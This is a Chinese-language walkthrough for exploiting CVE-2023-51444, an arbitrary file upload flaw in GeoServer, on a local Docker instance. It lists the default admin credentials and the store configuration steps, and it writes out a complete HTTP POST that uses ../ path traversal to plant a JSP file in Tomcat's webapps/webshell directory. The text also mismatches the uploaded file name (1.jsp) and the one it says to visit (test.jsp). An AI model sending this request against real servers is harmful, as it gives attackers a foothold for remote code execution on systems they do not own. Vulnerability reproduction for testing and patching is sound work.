Geoserver 任意文件上传（CVE-2023-51444）

• 本地搭建环境，还是使用docker来起一个geoserver服务。

docker run -itd -p 8080:8080 docker.osgeo.org/geoserver:2.22.x

• 默认登录账号密码：admin/geoserver

• 然后点击工作空间，新建一个test，点击保存。
• 然后点击新建存储仓库，数据源选择ImageMosaic，工作空间选择刚刚新建的test。
• 然后，重点来了，关系到你能不能成功。
• 下面的连接参数选项，需要选择绝对路径，以这个镜像为例，点击浏览，目录选择/（就是根目录），可以浏览服务器文件目录结构，找到GeoServer的存储目录（就是存我们刚刚选择的ImageMosaic的目录）。
• 应该是xxx/xxx/xxx/coverages/mosaic_sample/，这个镜像在/opt/geoserver_data/coverages/mosaic_sample/，就选择这个目录，然后保存就行了。
• 直接输入file:///opt/geoserver_data/coverages/mosaic_sample/
• 最后一步，上传任意文件。构造数据包，我直接多写几个../穿到根目录，后面再加要写入的目录绝对路径（上面浏览中可以看到所有目录结构）。(这里我们选择可以解析jsp文件的目录，可以根据实际情况修改)。而且需要填写Cookie。
• 注意两个test，前面的是工作空间，后面的是存储仓库。

POST /geoserver/rest/workspaces/test/coveragestores/test/file.shp?filename=../../../../../opt/apache-tomcat-9.0.86/webapps/webshell/1.jsp HTTP/1.1
Host: your-ip
Content-Length: 3
Accept:image/avif,image/webp,image/apng,image/svg+xml, image/*,*/*;9-0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
x-forwarded-for:127.0.0.1
Cookie: remember-me=xxxx
Content-Type: multipart/form-data;; boundary-----WebKitFormBoundaryfoycybhDiQZEqxoy
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<% out.println("Hello World！");%>

• 上传成功显示202
• 访问url/webshell/test.jsp，结束。

• 如果上传显示500，报错： Error while storing uploaded file:，说明最重要的一步存储仓库中的连接参数没有设置绝对路径。